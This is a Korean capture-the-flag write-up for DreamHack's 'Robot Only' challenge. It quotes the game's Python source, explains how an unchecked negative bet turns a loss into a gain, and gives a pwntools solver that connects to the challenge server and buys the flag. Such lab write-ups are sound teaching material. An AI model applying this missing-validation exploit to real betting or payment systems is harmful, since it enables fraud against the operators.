DreamHack - Robot Only 풀이

https://dreamhack.io/wargame/challenges/680/

Robot Only

 

 

주요 함수 - verify()

def verify():
    global verified

    if verified is True:
        print('you have already been verified as a robot :]')
        return

    randn224 = (get_randn() | get_randn() << 32 | get_randn() << 64 |
                get_randn() << 96 | get_randn() << 128 | get_randn() << 160)

    challenge = randn224 ^ 0xdeaddeadbeefbeefcafecafe13371337DEFACED0DEFACED0

    signal.alarm(3)
    signal.signal(signal.SIGALRM, timeout_handler)

    try:
        print('please type this same: "{0}"'.format(challenge))
        user_challenge = input('> ')

        if user_challenge == str(challenge):
            verified = True
            print('you\'re are now verified as a robot :]')
        else:
            print('you\'re not a robot ;[')
        signal.alarm(0)

    except MyTimeoutError:
        print('\nyou failed to verify! robots aren\'t that slow ;[')

 

challenge = randn224 ^ 0xdeaddeadbeefbeefcafecafe13371337DEFACED0DEFACED0
signal.alarm(3)

 

주어진 3초 안에 challenge 값을 입력하지 못하면 verify가 되지 못한다. 

이는 피지컬로 커버가 가능하다. 

 

주요 함수 - gamble()

def gamble():
    global money
    global verified

    if verified is False:
        print('you\'re are not verified as a robot ;[')
        return

    print('greetings, robot :]')

    bet = int(input('how much money do you want to bet (your money: ${0})? '.format(money)))
    if money < bet:
        print('you don\'t have enough money (your money: ${0}).'.format(money))
        return

    randn = get_randn()
    answer = randn % 5 + 1

    print('[1] [2] [3] [4] [5]')
    user_answer = int(input('pick one of the box > '))

    print('answer is [{0}]!'.format(answer))

    if user_answer == answer:
        print('you earned ${0}.'.format(bet))
        money += bet
    else:
        print('you lost ${0}.'.format(bet))
        money -= bet

    if money <= 0:
        print('you busted ;]')
        sys.exit()

 

랜덤으로 1~5까지 숫자를 맞추어서 베팅 금액만큼 얻고, 만약 틀리면 베팅 금액만큼 차감이 된다. 

 

주요 함수 - flag()

def flag():
    global money

    print('price of the flag is $10,000,000,000.')

    if money < 10000000000:
        print('you don\'t have enough money (your money: ${0}).'.format(money))
        return

    with open('./flag', 'rb') as f:
        print(b'flag is ' + f.read())
    sys.exit()

그렇게 money가 10000000000 이상이어야 flag를 얻을 수 있다. (기본 소지금은 500이다)

 

 

만약 사용자가 매번 자신의 최대 금액으로 베팅을 할 때마다 1/5 확률로 운 좋게 연속으로 맞다고 해도 33번가량을 맞아야 하기 때문에 불가능에 가깝다. 

 

 

bet = int(input('how much money do you want to bet (your money: ${0})? '.format(money)))
    if money < bet:
        print('you don\'t have enough money (your money: ${0}).'.format(money))
        return
        
   ...
        
    if user_answer == answer:
        print('you earned ${0}.'.format(bet))
        money += bet
    else:
        print('you lost ${0}.'.format(bet))
        money -= bet

하지만 코드 중에 문제가 몇 가지 있다.

하나는 베팅 금액을 지정할 때 음수 값을 검증하지 않는 것

둘은 졌을 경우 현재 돈에서 bet 만큼을 뺀다는 것

 

만일 사용자가 베팅 금액으로 -9999999를 입력했을 경우

사용자가 현재 가지고 있는 금액(500) 보다 베팅 금액이 넘지 않으므로 패스된다. (if 500 < -9999999)

 

그리고 4/5 확률로 틀리게 될 시

 

money = 500 - (-9999999)가 되므로 사용자는 500 + 9999999를 얻게 된다. 

 

 

solver.py

from pwn import *

while True:
    r = remote('host3.dreamhack.games', 22001)

    r.sendline(b'2') # verify you're a robot

    r.recvuntil('please type this same: ')
    user_challenge = r.recvline().decode().replace('"', '').strip()

    print('user challenge:', user_challenge)

    r.sendline(user_challenge) # verify

    r.recvuntil('>')
    r.sendline(b'1') # go to gamble

    r.sendline('-999999999999999')

    r.recvuntil('>')

    r.sendline(b'1') # user_answer

    try:
        r.recvuntil('3. buy flag')
    except:
        continue

    r.recvuntil('>')

    r.sendline(b'3') # buy flag

    r.recvline()

    flag = r.recvline().decode().strip()[2:-3]

    print(flag)

    break